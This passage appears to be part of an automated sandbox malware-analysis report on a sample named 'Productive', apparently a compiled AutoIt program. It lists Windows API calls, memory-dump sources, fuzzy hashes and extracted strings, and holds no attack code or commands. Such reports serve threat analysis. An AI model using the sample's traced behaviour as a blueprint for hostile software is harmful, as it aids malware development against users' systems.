                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 00312D92
                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 00312DD6
                                                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00312DF2
                                                                                                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00312E1C
                                                                                                                                                                • GetMenuItemID.USER32(?,?), ref: 00312E61
                                                                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00312EA7
                                                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00312EBB
                                                                                                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00312EDC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1460738036-0
                                                                                                                                                                • Opcode ID: 8e5735e2f392ec4ff66558a8dfca8ec490c6ce9f21b0cf65e848e13562355aae
                                                                                                                                                                • Instruction ID: 4cccdb5767a822e1eaabb38073de03b68fca3a56d2547e2756aabc8c1dfbd780
                                                                                                                                                                • Opcode Fuzzy Hash: 8e5735e2f392ec4ff66558a8dfca8ec490c6ce9f21b0cf65e848e13562355aae
                                                                                                                                                                • Instruction Fuzzy Hash: 0F61BF70A00249AFDB2ADF64DC88AFF7BB8EB09304F144459F851A7251D731ADA5DB31
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003375CA
                                                                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003375CD
                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 003375F1
                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00337614
                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0033768C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 312131281-0
                                                                                                                                                                • Opcode ID: eab4a0140c6b20a4127b35881292966ab443242335ad765567bd117fb9bd2784
                                                                                                                                                                • Instruction ID: 4bd23a53d8b3c083873370a8f80c8140ca9c2853ab961d1f8f68d27ef7d1b9fb
                                                                                                                                                                • Opcode Fuzzy Hash: eab4a0140c6b20a4127b35881292966ab443242335ad765567bd117fb9bd2784
                                                                                                                                                                • Instruction Fuzzy Hash: C3618BB5900248AFDB22DFA4CC85EEE77F8EB09710F140199FA14AB2A1C770AD41DB60
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 003119EF
                                                                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00310A67,?,00000001), ref: 00311A03
                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 00311A0A
                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00310A67,?,00000001), ref: 00311A19
                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00311A2B
                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00310A67,?,00000001), ref: 00311A44
                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00310A67,?,00000001), ref: 00311A56
                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00310A67,?,00000001), ref: 00311A9B
                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00310A67,?,00000001), ref: 00311AB0
                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00310A67,?,00000001), ref: 00311ABB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2156557900-0
                                                                                                                                                                • Opcode ID: a3eb86cb63882fa58a9393284cc7e46603e414f1c529f60754780506746545fd
                                                                                                                                                                • Instruction ID: 2fc0c26d1279a40d22e9b08c5f9abe56f2311f370cd755a6415de18c9ca82290
                                                                                                                                                                • Opcode Fuzzy Hash: a3eb86cb63882fa58a9393284cc7e46603e414f1c529f60754780506746545fd
                                                                                                                                                                • Instruction Fuzzy Hash: 7A31E375651208AFDB2B9F10EC48FEE3BADEF59315F124115FA05C61A0CB74ADC08B50
                                                                                                                                                                APIs
                                                                                                                                                                • GetSysColor.USER32(00000008), ref: 002B260D
                                                                                                                                                                • SetTextColor.GDI32(?,000000FF), ref: 002B2617
                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 002B262C
                                                                                                                                                                • GetStockObject.GDI32(00000005), ref: 002B2634
                                                                                                                                                                • GetClientRect.USER32(?), ref: 002EC0FC
                                                                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 002EC113
                                                                                                                                                                • GetWindowDC.USER32(?), ref: 002EC11F
                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 002EC12E
                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 002EC140
                                                                                                                                                                • GetSysColor.USER32(00000005), ref: 002EC15E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3430376129-0
                                                                                                                                                                • Opcode ID: 796373935b584636239b2cd701b65b947fa389dabfa134d9edfef5c20c39b74d
                                                                                                                                                                • Instruction ID: a169f6ebb363151613e5e7f5c919023ef8ebca16cf5c8fa1264887c70a02fd50
                                                                                                                                                                • Opcode Fuzzy Hash: 796373935b584636239b2cd701b65b947fa389dabfa134d9edfef5c20c39b74d
                                                                                                                                                                • Instruction Fuzzy Hash: 37119D35614245FFDB665FA4EC08BE97B69EB0A321F500265FB2A980E1CF311961EF10
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002D0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,002C2A3E,?,00008000), ref: 002D0BA7
                                                                                                                                                                  • Part of subcall function 002D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002C2A58,?,00008000), ref: 002D02A4
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 002C2ADF
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 002C2C2C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CurrentDirectory$FullNamePath
                                                                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                • API String ID: 1801377286-3738523708
                                                                                                                                                                • Opcode ID: 33f1755636f0d91f141a76c7e247fb3fdd3bf9475101b004a542b5a1a31d9929
                                                                                                                                                                • Instruction ID: 1a555346df8dafd232a2fbf68e6e20f76ced7dae90b7b66eea0cee16ad77dafb
                                                                                                                                                                • Opcode Fuzzy Hash: 33f1755636f0d91f141a76c7e247fb3fdd3bf9475101b004a542b5a1a31d9929
                                                                                                                                                                • Instruction Fuzzy Hash: 3302A2301183419FC725EF24C851EAFBBE5AF85354F104A2EF589972A2DB70DA69CF42
                                                                                                                                                                APIs
                                                                                                                                                                • EnumChildWindows.USER32(?,0030B13A), ref: 0030B078
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ChildEnumWindows
                                                                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                • API String ID: 3555792229-1603158881
                                                                                                                                                                • Opcode ID: 8e76c0393400c6a9113fabf12d52701b76e3932b28b74b5aae3972effc92192b
                                                                                                                                                                • Instruction ID: 508457ffda6be4e9ae5f383b032ac617980ed4c4f5a9a0a30e494b6c0be58068
                                                                                                                                                                • Opcode Fuzzy Hash: 8e76c0393400c6a9113fabf12d52701b76e3932b28b74b5aae3972effc92192b
                                                                                                                                                                • Instruction Fuzzy Hash: C691B770601A06EADB09EF60D491BEEFB75FF14300F54811AE85AA7291DF306D69CFA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0031E092
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0031E0A6
                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0031E0BE
                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 0031E0D8
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0031E0EA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                • String ID: *.*
                                                                                                                                                                • API String ID: 769691225-438819550
                                                                                                                                                                • Opcode ID: d3084f39700301f01e64821e17863a15ef93b6dfeeaa7419b3524dbae87fb1c8
                                                                                                                                                                • Instruction ID: 6950c96aa0c2c357c69d63f569358b4f0fdb61fdcfc987f3f67d557518e97cc4
                                                                                                                                                                • Opcode Fuzzy Hash: d3084f39700301f01e64821e17863a15ef93b6dfeeaa7419b3524dbae87fb1c8
                                                                                                                                                                • Instruction Fuzzy Hash: 378193715142019FC729EF24C8449EAB7E8AF9E310F158C2EF88AC7251E731EE85CB52
                                                                                                                                                                APIs
                                                                                                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 002B327E
                                                                                                                                                                  • Part of subcall function 002B218F: GetClientRect.USER32(?,?), ref: 002B21B8
                                                                                                                                                                  • Part of subcall function 002B218F: GetWindowRect.USER32(?,?), ref: 002B21F9
                                                                                                                                                                  • Part of subcall function 002B218F: ScreenToClient.USER32(?,?), ref: 002B2221
                                                                                                                                                                • GetDC.USER32 ref: 002ED073
                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002ED086
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 002ED094
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 002ED0A9
                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 002ED0B1
                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002ED13C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                • String ID: U
                                                                                                                                                                • API String ID: 4009187628-3372436214
                                                                                                                                                                • Opcode ID: deb38a00e462ce68398ea44487f9e1132b9f4c37e2e634edaa0b6ebc74545067
                                                                                                                                                                • Instruction ID: d5cb370db60311036262bd504b1f3b18c69a631936d0d68940b4f8094bbd595b
                                                                                                                                                                • Opcode Fuzzy Hash: deb38a00e462ce68398ea44487f9e1132b9f4c37e2e634edaa0b6ebc74545067
                                                                                                                                                                • Instruction Fuzzy Hash: 64711130524246EFCF22CF64C884AFA7BB5FF49360F184269ED595A1A6C7319CA1DF60
                                                                                                                                                                APIs
                                                                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0031A4D4
                                                                                                                                                                • LoadStringW.USER32(?,?,00000FFF,?), ref: 0031A4F6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LoadString
                                                                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                • API String ID: 2948472770-2391861430
                                                                                                                                                                • Opcode ID: 0d3c743c42ba8697cc7670ca7ddedd0b7d2b2c52f3d471a1bd46598b50d89a58
                                                                                                                                                                • Instruction ID: 00f8eaa778b17a59b17f10c5b0ae944ac2b4c26757a884e177f1dc1ba696df14
                                                                                                                                                                • Opcode Fuzzy Hash: 0d3c743c42ba8697cc7670ca7ddedd0b7d2b2c52f3d471a1bd46598b50d89a58
                                                                                                                                                                • Instruction Fuzzy Hash: 2251C331911109AACF1AEBE0CD46EEEB779EF09340F104229F505B20A2DB316FA9CF51
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B29E2: GetWindowLongW.USER32(?,000000EB), ref: 002B29F3
                                                                                                                                                                  • Part of subcall function 002B2714: GetCursorPos.USER32(?), ref: 002B2727
                                                                                                                                                                  • Part of subcall function 002B2714: ScreenToClient.USER32(003777B0,?), ref: 002B2744
                                                                                                                                                                  • Part of subcall function 002B2714: GetAsyncKeyState.USER32(00000001), ref: 002B2769
                                                                                                                                                                  • Part of subcall function 002B2714: GetAsyncKeyState.USER32(00000002), ref: 002B2777
                                                                                                                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0033C69C
                                                                                                                                                                • ImageList_EndDrag.COMCTL32 ref: 0033C6A2
                                                                                                                                                                • ReleaseCapture.USER32 ref: 0033C6A8
                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 0033C752
                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0033C765
                                                                                                                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0033C847
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                • API String ID: 1924731296-2107944366
                                                                                                                                                                • Opcode ID: 72e35b5757c6cd917b9baafad22c711ce8a7970efdff9a1a1a4da1730fcd23a4
                                                                                                                                                                • Instruction ID: d7bf9feee3a80de77cc85c026bb541b4effa8ff8afb339b18fb285d6e5cc3062
                                                                                                                                                                • Opcode Fuzzy Hash: 72e35b5757c6cd917b9baafad22c711ce8a7970efdff9a1a1a4da1730fcd23a4
                                                                                                                                                                • Instruction Fuzzy Hash: 3051BF74214304AFD716EF14CC9AFAA77E5EB84310F10891DF5999B2E2CB30A965CF52
                                                                                                                                                                APIs
                                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0032211C
                                                                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00322148
                                                                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0032218A
                                                                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0032219F
                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003221AC
                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003221DC
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00322223
                                                                                                                                                                  • Part of subcall function 00322B4F: GetLastError.KERNEL32(?,?,00321EE3,00000000,00000000,00000001), ref: 00322B64
                                                                                                                                                                  • Part of subcall function 00322B4F: SetEvent.KERNEL32(?,?,00321EE3,00000000,00000000,00000001), ref: 00322B79
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2603140658-3916222277
                                                                                                                                                                • Opcode ID: 1985f718b4c0053e572adaa9199f427a9f4e91de79bc29136c8f26d46833b277
                                                                                                                                                                • Instruction ID: 928165177c0a0940d429076bdc4024889945b8bc9828b0fe817fe98134cac051
                                                                                                                                                                • Opcode Fuzzy Hash: 1985f718b4c0053e572adaa9199f427a9f4e91de79bc29136c8f26d46833b277
                                                                                                                                                                • Instruction Fuzzy Hash: 5941AFB5600228BFEB179F60DC89FBB7BACEF08350F004116FA049A141DB71AE54CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002FFB41,00000010,?,Bad directive syntax error,00340980,00000000,?,?,?), ref: 0030FF7D
                                                                                                                                                                • LoadStringW.USER32(00000000,?,002FFB41,00000010), ref: 0030FF84
                                                                                                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00310048
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleLoadMessageModuleString
                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                • API String ID: 2734547477-4153970271
                                                                                                                                                                • Opcode ID: 176b1c5476d076b970aed556232892dbb1e3bbc669ed59649e1aab10b207a178
                                                                                                                                                                • Instruction ID: 2b40d6c1349e830e90152167c84b2a2a6591aafe1173a0517b4182a1bda47266
                                                                                                                                                                • Opcode Fuzzy Hash: 176b1c5476d076b970aed556232892dbb1e3bbc669ed59649e1aab10b207a178
                                                                                                                                                                • Instruction Fuzzy Hash: A9217E3295021EABCF16EF90CC1AFEE7779BF19300F04455AF505660A2DA71AA38DF51
                                                                                                                                                                APIs
                                                                                                                                                                • GetParent.USER32 ref: 00309D27
                                                                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00309D3C
                                                                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00309DC9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClassMessageNameParentSend
                                                                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                • API String ID: 1290815626-3381328864
